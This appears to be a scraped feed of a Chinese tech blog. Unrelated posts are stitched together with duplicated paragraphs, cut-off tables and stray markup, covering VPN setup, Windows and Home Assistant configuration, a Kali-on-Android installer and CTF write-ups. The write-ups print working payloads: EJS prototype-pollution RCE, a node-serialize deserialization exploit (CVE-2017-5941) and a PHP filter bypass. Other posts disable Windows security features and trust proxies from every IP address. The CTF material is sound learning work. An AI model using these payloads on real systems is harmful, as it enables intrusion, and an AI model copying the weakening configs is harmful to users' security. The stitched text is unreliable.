之前的方案有一些弊端,WireGuard原生使用UDP协议,在部分网络环境下会遭遇严重的丢包或拦截。虽然当时我们可以借助Phantun进行缓解,利用其将UDP数据流转换为伪装TCP数据流的特性,强行穿透三层和四层(NAPT)防火墙或NAT设备,但这种外挂工具链并不能在所有操作系统上完美兼容。因此,为了彻底解决协议层面的阻碍,本期我们将换用更成熟稳定的OpenVPN作为本项目的基础环境。
]]>之前的方案有一些弊端,WireGuard原生使用UDP协议,在部分网络环境下会遭遇严重的丢包或拦截。虽然当时我们可以借助Phantun进行缓解,利用其将UDP数据流转换为伪装TCP数据流的特性,强行穿透三层和四层(NAPT)防火墙或NAT设备,但这种外挂工具链并不能在所有操作系统上完美兼容。因此,为了彻底解决协议层面的阻碍,本期我们将换用更成熟稳定的OpenVPN作为本项目的基础环境。
而且,我们使用的服务器是具有公网IP的。我们可以通过NAT端口转发,将我们大内网中的某个端口映射到公网上。比如说你的大内网中有一台服务器,这个时候你可以将服务器的业务端口映射到公网,然后将管理端口保留在大内网中进行异地管理。
在开始实操之前,依旧是我们传统的:
免责声明 (叠甲环节)
我需要使用专门的段落强调一下,此处所提到的 VPN 是一种技术,正确使用是合法的,目前国内有许多企业或者高校仍在使用 VPN 技术进行远程办公,所以不要谈 VPN 色变。
在开始之前,我们需要明确的三点是:
之前的大内网战略: 使用WireGuard组建大内网环境 ↩︎
提供的软件如下:
| 软件 | 用途 |
|---|---|
| 7-Zip | 解压缩软件 |
| AIDA64 | 硬件信息查看 |
| BlueScreenView64 | 蓝屏记录查看 |
| CPU-Z | CPU 与硬件信息查看 |
| CrystalDiskInfo | 硬盘健康/SMART 查看 |
| CrystalDiskMark | 硬盘性能测试 |
| DiskGenius | 磁盘分区与数据管理 |
| Dism++ | 系统映像/组件维护 |
| Everything | 本地文件快速搜索 |
| Explorer++ | 文件管理器替代 |
| HWiNFO64 | 硬件监控与传感器信息 |
| ImgDrive | 虚拟光驱/镜像挂载 |
| MemTest64 | 内存稳定性测试 |
| PECMD | PE 启动菜单/脚本引擎 |
| WinNTSetup | Windows 安装/部署工具 |
| WinXshell | 终端与 SSH 客户端 |
提供的软件如下:
| 软件 | 用途 | |
]]>
我们在部署的时候只需要在配置文件中(如果使用宝塔面板、1panel 等工具则将其添加到伪静态)添加下面的代码即可。其中,将 http://127.0.0.1:8080/替换为你的后端地址。
location / {
try_files $uri $uri/ /index.html;
}
location /prod-api/ {
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header REMOTE-HOST $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass http://127.0.0.1:8080/;
}
关闭内核隔离,直接 win,然后搜索内核隔离就可以,然后点击详细关闭就可以。
关闭内核隔离,直接 win,然后搜索内核隔离就可以,然后点击详细关闭就可以。
关闭防火墙,这个 b 站都有详细的教学而且选择比较多,我不建议完全关闭防火墙,这里不做赘述。
然后是比较重点的问题,虚拟化的安全性是默认开启的,我们需要关闭虚拟化的安全性(图片是关闭后的)
这个关闭方法目前已知有 3 种,第一种是通过 bat 脚本关闭,这个脚本是由华为提供的,有新的版本,但是可能关不上,用老版本的可以关上,具体根据自己电脑来试。这里提供一个视频链接,为防止网盘过期,对应的老版本脚本会和这个文件放在一个文件夹。
@echo off
dism /Online /Disable-Feature:microsoft-hyper-v-all /NoRestart
dism /Online /Disable-Feature:IsolatedUserMode /NoRestart
dism /Online /Disable-Feature:Microsoft-Hyper-V-Hypervisor /NoRestart
dism /Online /Disable-Feature:Microsoft-Hyper-V-Online /NoRestart
dism /Online /Disable-Feature:HypervisorPlatform /NoRestart
REM ===========================================
mountvol X: /s
copy %WINDIR%\System32\SecConfig.efi X:\EFI\Microsoft\Boot\SecConfig.efi /Y
bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\SecConfig.efi"
bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions DISABLE-LSA-ISO,DISABLE-VBS
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X:
mountvol X: /d
bcdedit /set hypervisorlaunchtype off
echo.
echo.
echo.
echo.
echo =======================================================
echo 当前操作已完成,接下来请关闭此窗口并重启电脑,然后根据屏幕提示完成剩下操作。
pause > nul
echo.
echo.
编者小注: 在记事本中,请另存为 ANSI 格式。
第二种情况是进入 BOIS,然后进行操作,但是这种会影响虚拟机的使用。 第三种情况是下载雷电模拟器,用模拟器的引导来关闭,因为这个占用算力也影响模拟器运行,所以会附带他们的解决方法。
关闭虚拟安全,关闭完成后可以先试试能不能用。
如果不能,大概就是 VirtualBox 出的问题,进入 VirtualBox 打开 AR 模拟机会报错
这就是 ensp 里面 AR 设备不能使用的原因
需要按照以下步骤:
hdwwizdrivers\network\netadp6, 然后安装驱动。
到了这一步 VirtualBox 的 AR 基本可以正常启动了,如图
5.然后进 ensp 去重新注册 AR 设备,只选 AR。
我需要使用专门的段落强调一下,此处所提到的 VPN 是一种技术,正确使用是合法的,目前国内有许多企业或者高校仍在使用 VPN 技术进行远程办公,所以不要谈 VPN 色变。
本次我们搭建 WireGuard 所利用的就是专用网络(可以理解为局域网)这个属性,使得我们可以使用安全的方式链接到我们的局域网中的设备。并防止未经授权的登陆。
]]>我需要使用专门的段落强调一下,此处所提到的 VPN 是一种技术,正确使用是合法的,目前国内有许多企业或者高校仍在使用 VPN 技术进行远程办公,所以不要谈 VPN 色变。
本次我们搭建 WireGuard 所利用的就是专用网络(可以理解为局域网)这个属性,使得我们可以使用安全的方式链接到我们的局域网中的设备。并防止未经授权的登陆。
我在上周尝试使用 Tailscale 搭建了一个大内网环境。由于他们的服务器在境外,所以体验并不是特别如意。平时也可以勉强用用,但是上周有一节选修课的时候,我想使用电脑远程到我的远程计算机去写仍然没有完成的代码,但是 Tailscale 的延迟令我萌生出找到解决方案或者卸载掉它的冲动。
Tailscale DERP 部署上仍然有一些难度,且仍然有外网通信,影响效率。Tailscale 是基于 WireGuard 的,这给了一些启示。
我们可以使用 WireGuard 建立专用网络环境,但是我们的所有局域网节点设备均没有公网 IP,无法建立连接,需要有一台在公网环境下的服务器用于中转流量。我们在公网服务器上搭建 WireGuard 的服务端,然后让每个局域网节点设备均作为客户端进行工作。
在开始之前,我们需要明确的三点是:
声明
这里提供的是基于 LineageOS 二次开发的第三方 ROM,如需要下载官方 ROM 请前往 LineageOS 下载。我们认为你拥有自行处理此 ROM 的能力,我们只接受 bug 反馈和新功能建议,不接受由于你个人原因导致的问题和求助。
]]>声明
这里提供的是基于 LineageOS 二次开发的第三方 ROM,如需要下载官方 ROM 请前往 LineageOS 下载。我们认为你拥有自行处理此 ROM 的能力,我们只接受 bug 反馈和新功能建议,不接受由于你个人原因导致的问题和求助。
停更提醒
作者已经停止使用 Redmi Note 7 Pro 设备并将其转让,已经不具备 ROM 更新条件,现只做上游同步,不做新功能添加。你仍然可以在这里下载最新版本的镜像,感谢你的支持。
作为一名开发者,最离不开的就是终端了,我们需要一系列终端工具用于开发,也需要配置一系列环境,这时候就需要安装Command Line Tools. 这些工具提供 macOS 开发基本环境,是多数第三方工具和包管理器(如 Homebrew)的依赖。我们可以使用下面的命令安装。
xcode-select --install
作为一名开发者,最离不开的就是终端了,我们需要一系列终端工具用于开发,也需要配置一系列环境,这时候就需要安装Command Line Tools. 这些工具提供 macOS 开发基本环境,是多数第三方工具和包管理器(如 Homebrew)的依赖。我们可以使用下面的命令安装。
xcode-select --install
我这边已经安装完了,所以显示结果如图。
简单又完整的APK签名图形化工具
简单又完整的APK签名图形化工具
]]>在给她补充能源后,她又恢复了往日的生机。这台平板在 2018 年发布,仅在 2020 年就停止了官方维护,搭载着骁龙 660 的身体和 Android 8.1 的系统并无法在现在正常的使用。如何让她焕发生机,就成了这期文章的主题了。
目前来说,换一个 Soc 很困难,但是对于老款小米来说的话,解锁 Bootloader 应该是个轻松的事情。系统搭载着基于 Android 8.1 的 MIUI 10 ,只需要在登录小米账号后等 7 天就行。我们在这期间测试了这个系统能否在现在的环境下正常使用。
]]>在给她补充能源后,她又恢复了往日的生机。这台平板在 2018 年发布,仅在 2020 年就停止了官方维护,搭载着骁龙 660 的身体和 Android 8.1 的系统并无法在现在正常的使用。如何让她焕发生机,就成了这期文章的主题了。
目前来说,换一个 Soc 很困难,但是对于老款小米来说的话,解锁 Bootloader 应该是个轻松的事情。系统搭载着基于 Android 8.1 的 MIUI 10 ,只需要在登录小米账号后等 7 天就行。我们在这期间测试了这个系统能否在现在的环境下正常使用。
首先是系统软件,系统软件都无法更新,并停留在 MIUI 10 时期的设计风格。这个风格和操作逻辑在目前来说已经过时(甚至都不支持音量下 + 电源键截屏)。系统虽然支持了全面屏操作手势,但是操作尚未进行打磨,略感生硬一点。从之前的生态发展情况来看,安卓平板一直都不景气,维护周期低也属于正常情况。
对于 LTE 版本的话,官方系统阉割了电话功能,你插卡只能使用短信和移动数据。当然也是有一点好处的。毕竟广告 API 都换接口了,没有(系统)广告也是真的。
对于第三方应用,这个时候就体现出国内软件强大的兼容性了。几乎所有的国产软件都可以在安卓 7.1 和 5.1 下正常运行,甚至有的软件可以在安卓 4.x 版本下运行。在原版系统不刷任何模块的情况下,如果单纯日常使用已经足够了。
但是如果要使用境外软件的话,这台平板在官方系统上完全谈不到能用。
首先,MIUI 10 并没有给预装 GMS 套件,这导致了你可以与很多 App 说 Bye 了。其次,这系统 版本也过于老旧了,就拿 Microsoft Remote Desktop 举例,最新的版本的 Min SDK 是 API 28 (Android 9)。如果要使用的话就只能使用老版本和老旧的软件解码器。诸如 Microsoft 365 和 Google Chrome 等一众生产力功能已经无法安装。
另附注:Webview 版本是 71 的,也意味着你打不开很多先进的网页。对于爱奇艺神器来说的话,也已经无法维持正常的工作了。
在进行了 7 天的煎熬的等待后,这个平板终于可以解锁 BootLoader 了。我逛遍了各大论坛,这个板子使用两种包,一种是类原生,一种是 MIUI 13 的官改包。
先来盘点一下 MIUI 13 的包,目前来说,我能找到的包都是 Android 11 的包。考虑到她的渺小的 System 分区和那已经过时的 4 GB 运行内存,我不认为刷这个包可以带来多好的体验。由于 System 分区根本不够用,系统肯定要阉割很多组件。如果你刷机是奔着和你的小米手机互联,则可以考虑一下,否则完全不建议你刷入官改 MIUI 13.
我选择的是 Crdroid Android 的类原生系统,目前对比下来,Crdroid 的系统仍然在持续更新中,并且已经更新 Android 15,而且他们家对于大屏方面的优化要强于其他的类原生操作系统。Crdroid 的官网充斥着广告和随意跳转的链接,我们可以通过 SourceForge 的下载链接下载,她的代号是clover,只需要找到对应的代号下载即可。
在刷入的时候我就遇到了一个坑,我的电脑 USB 接口是 USB 3.0 的,在连接 Fastboot 模式后不识别我的设备,这个可以参照我之前的一篇教程解决: https://www.hestudio.net/posts/fix-xiaomi-fastboot-driver.html
刷入之后可以正常使用,使用过程中有些小卡顿,但是至少是可以正常使用了。
关于校验的问题,这个我还没太搞懂,可能要靠大家帮忙了。事情是这样的,我本来想给这个板子刷面具,但是刷入之后修补 Boot 之后无法进入系统(也就是卡米),只能靠还原 Boot 恢复。之前刷过一台手机(不应该当着她的面提另一台手机的,她会吃醋的),出现这个问题的原因是没有关 AVB 校验,导致校验不通过。但是我没有在包中找到她的 vbmeta.img,不知道如何开 Root. 目前我有一种方案,就是重新打包 ROM,然后在 ROM 中集成 Magisk,可能这个方法能解决问题,我并未尝试,不知道有没有作用。
之后就放寒假了,我将她和其他设备一起塞进包里一起打包带回家了。当时正在写 Web 的动态布局,所以用这个平板作为测试用机使用。后来项目写完了,平板就放在那里吃灰了。毕竟这么一个 7 年前的平板的性能肯定是不如现在性能强悍的旗舰机的。这个平板也就被我弟拿去玩去了。
对于游戏来说,我弟在这个平板上下载了三款游戏,分别是暗区突围、沙威玛传奇、Minecraft.其中,Minecraft 在该平板运行的效果不是特别好,有卡顿感,这个东西跟个人习惯和插件数量有关。据我弟描述(我不会玩),这个平板玩暗区突围的体验还是很可以的,腾讯对游戏的优化还是很不错的(让每一个小学生都能平等的充值 648)。我记得在 2020 年的时候,我的上古 OPPO A59s 仍然可以打吃鸡。
那对于软件的话,就有点差强人意了。 这个平板不能同时运行两个 3A 大作,一旦出现两个 3A 大作(QQ 和抖音)同时出现在后台,这个平板就会寄掉。我愿称这俩为大厂优化最烂的软件了(自家的游戏都比这个流畅)。大厂通过优化极强的游戏和极低的爆率为国家提供极高的 GDP,然后使用优化极烂的社交软件让大学生为手机厂商贡献出旗舰机的销量,变相贡献 GDP.
微信:登录已过期,请重新登录。
可能冷落她的时间有点长了,她的耐心已经殆尽,单次充满电的使用时长已经不超过一个小时了。我在闲鱼(不是广子)上淘了一块电池,准备给她换上。大概等了三年(天上一天地上一年)终于拿到电池了。
我之前认为这个平板是塑料壳子的(这个质感和外观很难想象是金属的),但是这个确实是金属的,我拆了一下午都拆不开,只能在外面找了一个手机店拆机(手机店老板查教程拆了半个小时才拆开)。
这个系统还差了一点东西,比如下载应用不方便、通知接收问题。Crdroid 的包里并没有 GMS 套件,需要手动补全。OpenGapps 的 Github 目前仍在更新,但是官方 Release 只更新到 Android 11。
我刷的是NikGapps的 GMS 套件,这个平板只能刷 Core 包(毕竟 System 分区就那点大小了)。当时刷的时候刷的是 Full 包,刷入的时候一直报错空间不足,我只能刷回 Crdroid 包覆盖掉。但是,Crdroid 会备份包内的其他应用,刷完之后再恢复(这点比 LineageOS 做的强一点)。
最后的解决方案是这样的:先抹掉 System 分区,然后刷入 Crdroid,最后刷入 GMS Core 套件。重启系统时候过一遍 OOBE 就可以正常使用了,数据也可以正常保留。
如今,这台小米平板 4 Plus 在经历重重改造后,虽不再拥有全新设备的极致性能,却以独特的姿态在生活中找到了新的定位。她见证了数码科技的变迁,从曾经官方维护停止的黯淡,到在各种折腾与优化下重获新生。现在的她,偶尔被我拿来查阅资料,在那不算流畅却也稳定的操作中,开启一段别样的信息探索之旅;而当我望着她,心中满是感慨,这不仅是一次对旧设备的拯救,更是一场与数码过往的对话。未来,或许她还会面临新的挑战,但我相信,只要对数码的热爱与探索精神不灭,她定能继续在时光里闪耀独属于自己的微光,续写属于她的不凡故事 。
最后,附上几张使用图片。
400: Bad Request或者Unable to connect to Home Assistant.的问题,经过我研究后找到了一个完美且暴力的方案,就是放行所有 IP 地址。
在<Home Assistant目录>/config/configuration.yaml里添加这么一段内容并重启 Home Assistant.
http:
use_x_forwarded_for: true
trusted_proxies:
- 0.0.0.0/0
400: Bad Request或者Unable to connect to Home Assistant.的问题,经过我研究后找到了一个完美且暴力的方案,就是放行所有 IP 地址。
在<Home Assistant目录>/config/configuration.yaml里添加这么一段内容并重启 Home Assistant.
http:
use_x_forwarded_for: true
trusted_proxies:
- 0.0.0.0/0
DeepSeek大过年的给美股来了几下子,在我们过年的时候让洋人过不了一个安稳年(滑稽)。直到我写这篇帖子的时候,DeepSeek 的部分服务仍然处于一个不可用的状态。
本着增强动手能力(整活)的心态,我决定在我的手机上安装一个deepseek-r1模型。由于在电脑上安装过于简单,将不再赘述。
DeepSeek大过年的给美股来了几下子,在我们过年的时候让洋人过不了一个安稳年(滑稽)。直到我写这篇帖子的时候,DeepSeek 的部分服务仍然处于一个不可用的状态。
本着增强动手能力(整活)的心态,我决定在我的手机上安装一个deepseek-r1模型。由于在电脑上安装过于简单,将不再赘述。
为了通过本地环回地址映射到非标准端口的 SMB 服务,首先需要停止并禁用本机的 SMB 服务。
打开 Windows 服务管理器:
Win + R,输入 services.msc,然后按回车。Server 服务。
停止并禁用 Server 服务:
Server 服务,选择 停止。属性,将启动类型设置为 禁用。
重启电脑以确保更改生效。
为了通过本地环回地址映射到非标准端口的 SMB 服务,首先需要停止并禁用本机的 SMB 服务。
打开 Windows 服务管理器:
Win + R,输入 services.msc,然后按回车。Server 服务。停止并禁用 Server 服务:
Server 服务,选择 停止。属性,将启动类型设置为 禁用。重启电脑以确保更改生效。
接下来,我们需要通过命令提示符设置端口转发,将本地的 445 端口映射到远程 SMB 服务器的非标准端口。
以管理员身份打开命令提示符:
Win + X,选择 Windows PowerShell (管理员) 或 命令提示符 (管理员)。输入以下命令来设置端口转发:
netsh interface portproxy add v4tov4 listenport=445 listenaddress=172.16.61.16 connectaddress=<服务器IP或域名> connectport=<服务器端口>
其中:
listenport=445 表示本地监听的端口。listenaddress=172.16.61.16 表示本地监听的 IP 地址。connectaddress=<服务器IP或域名> 表示远程 SMB 服务器的 IP 地址或域名。connectport=<服务器端口> 表示远程 SMB 服务器的端口号。完成端口转发设置后,您可以通过以下方式连接 SMB 服务:
\\127.0.0.1,然后按回车。此时,Windows 将通过本地环回地址连接到远程 SMB 服务器,绕过默认的 445 端口限制。
Server 服务并删除端口转发规则。通过以上步骤,您可以成功在 Windows 上连接非标准端口的 SMB 服务,实现设备备份和数据共享。
]]>v4.0.x重新撰写教程。
在写新版脚本之前,我们在 QQ 群里里统计了 Android 用户的版本占比,并根据统计的结果作为优化侧重点。,根据统计结果,我们侧重于高版本 Android 的优化,并推出了导致 proot 容器闪退的集成解决方案,使用户更容易的使用脚本。
建议在安装之前,先粗略的阅读一遍教程和文章底部的文档,方便在遇到问题是及时定位到相应的文档。
v4.0.x重新撰写教程。
在写新版脚本之前,我们在 QQ 群里里统计了 Android 用户的版本占比,并根据统计的结果作为优化侧重点。,根据统计结果,我们侧重于高版本 Android 的优化,并推出了导致 proot 容器闪退的集成解决方案,使用户更容易的使用脚本。
建议在安装之前,先粗略的阅读一遍教程和文章底部的文档,方便在遇到问题是及时定位到相应的文档。
由于 kali 官方的 Nethunter 的安装代码因为...无法访问,手头又没有一些受支持的机器,所以做了这个脚本,供大家使用。
你可以在 Github 下载Termux的安装包,也可以通过关注微信公众号 heStudio Community回复 kali 获取下载链接。
打开 Termux, 运行安装脚本。
提示
本脚本和教程全部基于非 Root 设备撰写,初衷是为了让未 Root 的设备也能用上 Kali Nethunter.经过我们测试发现,该脚本仍然适用于 Root 用户。在 Root 状态下,你可以拥有一个近乎完美的体验。但是在默认状态下使用 Termux,仍然为非 Root 状态,在这种状态下,即使你的设备已经 Root,也无法使用 Root 后的功能。如果想要在 Root 状态下体验完整功能,请在 Root 状态下执行完整操作(从安装到使用都要在 Root 状态下执行)。详见使用Root权限运行。
termux-setup-storage && curl -O --url https://res.hestudio.net/kali_for_android/install.sh && chmod +x install.sh && ./install.sh
根据脚本操作即可。如果遇到以下情况,请直接点击回车:
按照提示跟着教程完成安装即可。
from Crypto.Cipher import ChaCha20_Poly1305
import os
key = os.urandom(32)
nonce = os.urandom(12)
with open('flag.txt', 'rb') as f:
plaintext = f.read()
cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(plaintext)
print(f"Encrypted Flag: {ct.hex()}")
print(f"Tag: {tag.hex()}")
print(f"Nonce: {nonce.hex()}")
with open('key.txt', 'w') as key_file:
key_file.write(key.hex())
from Crypto.Cipher import ChaCha20_Poly1305
import os
key = os.urandom(32)
nonce = os.urandom(12)
with open('flag.txt', 'rb') as f:
plaintext = f.read()
cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(plaintext)
print(f"Encrypted Flag: {ct.hex()}")
print(f"Tag: {tag.hex()}")
print(f"Nonce: {nonce.hex()}")
with open('key.txt', 'w') as key_file:
key_file.write(key.hex())
Encrypted Flag: 20408b9fc498063ad53a4abb53633a6a15df0ddaf173012d620fa33001794dbb8c038920273464e13170e26d08923aeb
Tag: 70ffcc508bf4519e7616f602123c307b
Nonce: d8ebeedec812a6d71240cc50
3=t#sMX3?9GHSPdi4i^gk!3*(cH8S8XT2y&?Tv4!?AGG=R]ZDy/PVVa+DqiXAH*}DS&Nn*a+@<H,=!L
题目描述:你的意思是说,只要我继续打 ctf,下次做 crypto 时,就会有一个长腿黑丝双马尾的甜妹突然坐到我的腿上,并害羞的红着脸对我说,前辈你 crypto 打的真厉害,所以要不要和我交往!
查看文件附件提供的可以并不是真正的key,真正的key是 32 位 HEX 值。尝试对 key 进行解密,尝试各种解密方案,最后可以通过 base92 对key进行解密。
另注:这题跟 ChaCha20-Poly1305 一点关系都没有,提交给官方的 Write UP 没说这句。
173974535637a5ef30a116b03d00bd2fe751951ca3eaa62daec2b8f5ca5b6135
获取到key后,可以编写 payload 解密。
from Crypto.Cipher import ChaCha20_Poly1305
from binascii import unhexlify
# 已知的加密参数(替换为实际值)
key_hex = "173974535637a5ef30a116b03d00bd2fe751951ca3eaa62daec2b8f5ca5b6135"
nonce_hex = "d8ebeedec812a6d71240cc50"
ciphertext_hex = "20408b9fc498063ad53a4abb53633a6a15df0ddaf173012d620fa33001794dbb8c038920273464e13170e26d08923aeb"
tag_hex = "70ffcc508bf4519e7616f602123c307b"
# 转换十六进制为字节
key = unhexlify(key_hex)
nonce = unhexlify(nonce_hex)
ciphertext = unhexlify(ciphertext_hex)
tag = unhexlify(tag_hex)
# 创建解密器
cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
try:
# 解密并验证
plaintext = cipher.decrypt_and_verify(ciphertext, tag)
print(f"解密后的明文: {plaintext.decode()}")
except ValueError as e:
print(f"解密失败: {str(e)}")
]]>其实用在线工具也能解出来。
backdoor
// backdoor
app.post("/UserList", (req, res) => {
user = req.body;
const blacklist = ["\\u", "outputFunctionName", "localsName", "escape"];
const hacker = JSON.stringify(user);
for (const pattern of blacklist) {
if (hacker.includes(pattern)) {
res.status(200).json({ message: "hacker!" });
return;
}
}
copy(users, user);
res.status(200).json(user);
});
backdoor
// backdoor
app.post("/UserList", (req, res) => {
user = req.body;
const blacklist = ["\\u", "outputFunctionName", "localsName", "escape"];
const hacker = JSON.stringify(user);
for (const pattern of blacklist) {
if (hacker.includes(pattern)) {
res.status(200).json({ message: "hacker!" });
return;
}
}
copy(users, user);
res.status(200).json(user);
});
黑名单检查后会执行copy函数,我们再看一下copy函数。
function copy(object1, object2) {
for (let key in object2) {
if (key in object2 && key in object1) {
copy(object1[key], object2[key]);
} else {
object1[key] = object2[key];
}
}
}
copy会将所有传入的内容全部传给users这个对象。
const blacklist = ["\\u", "outputFunctionName", "localsName", "escape"];
由于blacklist禁用掉了很多函数(甚至也禁用掉了 Unicode 标准符号),我们需要另寻他法执行 RCE.同时,感谢黑名单提醒我该如何完成这道题(没有黑名单我根本不知道 RCE 这个思路)
我们尝试在render处打断点,当GET localhost/后一步一步查看。
我们可以尝试使用outputFunctionName并列的destructuredLocals实现远程执行命令。opts.destructuredLocals[i]使用的是数组,所以我们要使用数组的方式传入。根据代码结构,我们准备如下示例字符串。
a=a;global.process.mainModule.require('child_process').execSync('calc');//var __tmp2
完整的数据就是:
{
"__proto__": {
"destructuredLocals": [
"a=a;global.process.mainModule.require('child_process').execSync('calc');//var __tmp2"
]
}
}
我们将上述字符串发给/UserList,然后请求/,可以顺利打开计算器。
现在,我们只要据此修改 Payload,使用替换命令将/flag复制替换掉模板的index.ejs即可。
a=a;global.process.mainModule.require('child_process').execSync('cp /flag /app/views/index.ejs');//var __tmp2
{
"__proto__": {
"destructuredLocals": [
"a=a;global.process.mainModule.require('child_process').execSync('cp /flag /app/views/index.ejs');//var __tmp2"
]
}
}
将以上 JSON 发给/UserList,然后请求两次/(一遍是为了让命令运行生效,一遍是为了获取 flag),可以顺利获得 flag.
根据题目源码,我们可以找到路径。
app.get("/login", function (req, res) {
res.render("login");
});
根据题目源码,我们可以找到路径。
app.get("/login", function (req, res) {
res.render("login");
});
打开后是一个登录界面。
根据代码中的账密可以登录。
users = { guest: "123456" };
让我们看一下代码。
app.post("/login", function (req, res) {
username = req.body.username;
password = req.body.password;
if (!username || !password) {
return res.status(400).send("用户名和密码都是必填项");
}
if (!users[username]) {
return res.status(409).send("用户名不存在");
} else {
if (users[username] === password) {
token = Buffer.from(
serialize.serialize({ username: username, isAdmin: false }),
).toString("base64");
res.cookie("token", token, {
maxAge: 900000,
httpOnly: true,
});
return res.status(200).redirect("/index");
} else {
return res.status(200).send("密码错误");
}
}
});
此处已代码格式化,题目提供的源码没有代码格式化。
当验证通过后,网页会向我们发送一个由 base64 包裹的 Cookie,我们可以在浏览器获得这个 Cookie.
此处使用的是 EditThisCookie 浏览器插件,实际上在开发者模式中也可以查改 Cookie.
将 token 解密后可以获得 Cookie 的内容,我们就要从这里下手。
那继续分析一下代码。
当访问/index会调用auth函数验证身份。
app.get("/index", auth, function (req, res) {
res.render("index");
});
function auth(req, res, next) {
if (req.cookies.token) {
const user = serialize.unserialize(
Buffer.from(req.cookies.token, "base64").toString(),
);
if (!user.username) {
return res.status(401).redirect("/login");
}
} else {
return res.status(401).redirect("/login");
}
next();
}
在这里会将传入的 Cookie 反序列化,这里就是下手点。
我们返回package.json, 查看依赖版本。
"node-serialize": "^0.0.4"
版本符合CVE-2017-5941的限定版本。
Node.JS Remote Code Execution ≈ Packet Storm中提供了此 CVE 的 Payload,使用
code = "_$$ND_FUNC$$_" + payload;
代码可以触发 RCE 漏洞。
我们可以据此编写一个 Payload.
{
"username": "guest",
"isAdmin": false,
"payload": "_$$ND_FUNC$$_function(){require('child_process').execSync('cp /flag /app/views/index.ejs')}()"
}
将其转为 base64,然后替换掉 token 即可获取 flag.
]]><?php
error_reporting(0);
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
die("Blocked by security filter!");
} else {
eval($cmd);
}
} else {
highlight_file(__FILE__);
}
?>
<?php
error_reporting(0);
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
die("Blocked by security filter!");
} else {
eval($cmd);
}
} else {
highlight_file(__FILE__);
}
?>
进入网页后显示了以上代码。它过滤了一些关键字(为什么还有空格!!),我们需要在上面运行 Shell,拿到 flag。
但是它有点小粗心,没有禁止assert,那我要发挥咯~~
我们可以assert套一层base64拿到flag.
先将以下命令转为base64
shell_exec("cat /flag")
然后再包含进代码中,GET请求发过去。
assert(base64_decode("c2hlbGxfZXhlYygiY2F0IC9mbGFnIik="))
程序运行时,会让你输入 flag,并将你输入的文本传给一个加密算法,如果验证和已加密文本v5吻合,则提示Yeah,You get what you want!!!
我们可以观察到,验证结果在v2上,如果v2为True,则通过验证。
程序运行时,会让你输入 flag,并将你输入的文本传给一个加密算法,如果验证和已加密文本v5吻合,则提示Yeah,You get what you want!!!
我们可以观察到,验证结果在v2上,如果v2为True,则通过验证。
if ( v2 )
v1 = "Yeah,You get what you want!!!";
我们继续查看v2
v2 = sub_140011217(v6, (unsigned int)v0, v5);
追踪该函数可得:
__int64 __fastcall sub_140011860(__int64 a1, int a2, _BYTE *a3)
{
__int64 v4; // rbx
_BYTE *v6; // rax
__int64 v7; // rdi
v4 = a2;
sub_1400112C1(&unk_14001E00F);
if ( (int)v4 <= 0 )
return 1LL;
v6 = a3;
v7 = a1 - (_QWORD)a3;
while ( v6[v7] == *v6 )
{
if ( ++v6 - a3 >= v4 )
return 1LL;
}
return 0LL;
}
这是一个比较函数,用于比对字符串是否符合要求。将v6和v5进行比对。
我们继续向上分析,v6为我们输入的文本,
sub_140011073("%s", (const char *)v6);
然后会传入
sub_1400112E9(v6, (unsigned int)v0, v4);
推测这个就是加密函数,v4就是密钥:
strcpy(v4, "ISCTF");
追踪sub_1400112E9函数可得:
__int64 __fastcall sub_1400117A0(_BYTE *a1, int a2, __int64 a3)
{
__int64 result; // rax
int i; // r9d
int v8; // r8d
result = sub_1400112C1((__int64)&unk_14001E00F);
for ( i = 0; i < a2; ++a1 )
{
v8 = (char)*a1;
result = (unsigned int)(v8 - 65);
if ( (unsigned __int8)(*a1 - 65) <= 0x19u )
{
v8 += *(char *)(i % 5u + a3);
result = (unsigned int)(26 * (v8 / 26));
LOBYTE(v8) = v8 % 26 + 65;
}
*a1 = v8;
++i;
}
return result;
}
将加密模块用 Python 复现:
def generate_payload(target_text, key):
payload = ""
key_length = len(key)
for i, char in enumerate(target_text):
if 'A' <= char <= 'Z':
shift = ord(key[i % key_length])
original_char = (ord(char) - 65 - shift + 65) % 26 + 65
payload += chr(original_char)
else:
payload += char
return payload
target_text = "QKEMK{7JB5_i5_W3SllD_3z_W3}"
key = "ISCTF"
payload = generate_payload(target_text, key)
print("Generated Payload:", payload)
运行即可得到 flag.
]]><?php
error_reporting(0);
class Flag {
private $flag;
public function __construct() {
$this->flag = file_get_contents('/flag');
}
public function getFlag() {
return $this->flag;
}
public function __toString() {
return "You can't directly access the flag!";
}
}
class User {
public $username;
public $isAdmin = false;
public function __construct($username) {
$this->username = $username;
}
public function __wakeup() {
if ($this->isAdmin) {
echo "Welcome, admin! Here's your flag: " . (new Flag())->getFlag();
} else {
echo "Hello, " . htmlspecialchars($this->username) . "!";
}
}
}
if (isset($_GET['data'])) {
$data = $_GET['data'];
$object = unserialize($data);
if ($object instanceof User) {
echo $object;
} else {
echo "Invalid object!";
}
} else {
highlight_file(__FILE__);
}
?>
<?php
error_reporting(0);
class Flag {
private $flag;
public function __construct() {
$this->flag = file_get_contents('/flag');
}
public function getFlag() {
return $this->flag;
}
public function __toString() {
return "You can't directly access the flag!";
}
}
class User {
public $username;
public $isAdmin = false;
public function __construct($username) {
$this->username = $username;
}
public function __wakeup() {
if ($this->isAdmin) {
echo "Welcome, admin! Here's your flag: " . (new Flag())->getFlag();
} else {
